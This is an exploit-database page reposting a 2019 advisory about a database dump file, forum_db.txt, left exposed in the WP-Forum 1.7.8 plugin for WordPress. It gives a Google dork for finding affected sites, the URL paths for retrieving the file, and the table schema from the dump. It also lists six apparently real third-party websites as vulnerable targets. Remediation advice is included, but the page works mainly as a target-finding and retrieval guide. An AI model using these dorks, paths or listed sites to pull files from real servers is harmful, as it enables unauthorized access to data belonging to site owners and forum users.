Advertisement






WordPress 2.0.2 WP-Forum Plugins 1.7.8 Database Disclosure

CVE Category Price Severity
N/A CWE-200 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2019-03-27
CPE
cpe:cpe:/a:wordpress:wp_forum:1.7.8
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030225

Below is a copy:

WordPress 2.0.2 WP-Forum Plugins 1.7.8 Database Disclosure
###########################################################################

# Exploit Title : WordPress 2.0.2 WP-Forum Plugins 1.7.8 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 27/03/2019
# Vendor Homepage : wordpress.org
# Software Information Link :
github.com/motdotla/annmotte.com/blob/master/wp-content/plugins/wp-forum/forum_db.txt
wordpress.org/plugins/tags/wp-forum/
# Software Affected Version : WordPress 2.0.2 and 2.1 / Plugin Version 1.7.8
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : forum_db.txt inurl:/wp-content/plugins/wp-forum/
# Vulnerability Type : 
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Information Link about phpMyAdmin SQL dump File => 
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/

###########################################################################

# Information About Software :
****************************
Simple discussion forum plugin for WordPress. With support for different skins, 3 included 

by default, changeable from the WP admin interface. Admin can choose if unregistered posting is 

allowed and Captcha (optional) is used for spam control. Tight interaction with Wordpress

 makes an easy to use and administer plugin.

# Installation :
*************
1. Rename wpforum to wp-forum and copy it to to wp-content/plugins
1. Go and activate the plugin
1. Create a page from the Manage tab
1. Click on the HTML button in Wordpress and then insert: `<!--WPFORUM-->`
1. Go to manage->wp-forum and start adding groups and forums.
1. You must then visit the WP-Forum options panel in WP admin.
1. Setup a link to your forum (unless you have your pages auto-linking in the navigation menu)
1. To show the latest acitvity in the sidebar add this code: 
`<?php forum_latest_acivity(numbers_to_show);?>` where numbers_to_show is an actual number like 1,2,3
1. If you upload a new version go to plugin managment and deactivate and 
the activate WP-Forum. Visit the structure page of the wp-forum management.

###########################################################################

# Impact :
***********
* An information exposure is the intentional or unintentional disclosure of information to 

an actor that is not explicitly authorized to have access to that information.

* The product stores sensitive information in files or directories that are accessible 

to actors outside of the intended control sphere.

* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of 

MySQL over the World Wide Web. It can be used to dump a database or a collection of databases 

for backup or transfer to another SQL server (not necessarily a MySQL server). 

The dump typically contains SQL statements to create the table, populate it, or both. 

This file contains an phpMyAdmin SQL dump. This information is highly sensitive 

and should not be found on a production system.

Remediation : Restrict access to this file or remove it from the system.

###########################################################################

# Database Disclosure Exploit :
***************************
/wp-content/plugins/wp-forum/forum_db.txt

/wp-content/plugins/wp-form/wpforum/forum_db.txt

# Information :
**************
-- phpMyAdmin SQL Dump
-- version 2.7.0-pl2
-- phpmyadmin.net
-- 
-- Host: localhost
-- Server version: 5.0.19
-- PHP Version: 5.1.4
-- 
-- Database: `wordpress`
-- 
-- --------------------------------------------------------

-- 
-- Table structure for table `wp_forum_forums`
-- 

CREATE TABLE `wp_forum_forums` (
  `id` int(11) NOT NULL auto_increment,
  `name` varchar(255) NOT NULL default '',
  `parent_id` int(11) NOT NULL default '0',
  `description` varchar(255) NOT NULL default '',
  `views` int(11) NOT NULL,
  PRIMARY KEY  (`id`)
 
)  ;

-- --------------------------------------------------------

-- 
-- Table structure for table `wp_forum_groups`
-- 

CREATE TABLE `wp_forum_groups` (
  `id` int(11) NOT NULL auto_increment,
  `name` varchar(255) NOT NULL default '',
  PRIMARY KEY  (`id`)
) ;

-- --------------------------------------------------------

-- 
-- Table structure for table `wp_forum_posts`
-- 

CREATE TABLE `wp_forum_posts` (
  `id` int(11) NOT NULL auto_increment,
  `author_name` varchar(255) default NULL,
  `author_email` varchar(255) default NULL,
  `author_web` varchar(255) default NULL,
  `text` longtext,
  `thread_id` int(11) NOT NULL default '0',
  `date` datetime NOT NULL default '0000-00-00 00:00:00',
  `author_id` int(11) NOT NULL,
  `subject` varchar(255) NOT NULL,
  `views` int(11) NOT NULL,
  PRIMARY KEY (`id`)
 
)  ;

-- --------------------------------------------------------

-- 
-- Table structure for table `wp_forum_threads`
-- 

CREATE TABLE `wp_forum_threads` (
  `id` int(11) NOT NULL auto_increment,
  `forum_id` int(11) NOT NULL default '0',
  `views` int(11) NOT NULL default '0',
  `subject` varchar(255) NOT NULL default '',
  `date` datetime NOT NULL default '0000-00-00 00:00:00',
  PRIMARY KEY  (`id`)
)   ;

###########################################################################

# Example Vulnerable Sites :
*************************
[+] centres-animation-quartiers-bordeaux.eu/wp-content/plugins/wp-forum/forum_db.txt

[+] thebrashbrothers.com/wp-content/plugins/wpforum/forum_db.txt

[+] dgerard.com/news.41clubs.be/wp-content/plugins/wp-forum/forum_db.txt

[+] ridceo.rid.go.th/udornth/xxnongkungthanasan/wp-content/plugins/wp-form/wpforum/forum_db.txt

[+] templebaptistchurchonline.com/wordpress/wp-content/plugins/wp-forum/forum_db.txt

[+] templebaptist.church/wordpress/wp-content/plugins/wp-forum/forum_db.txt

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###########################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.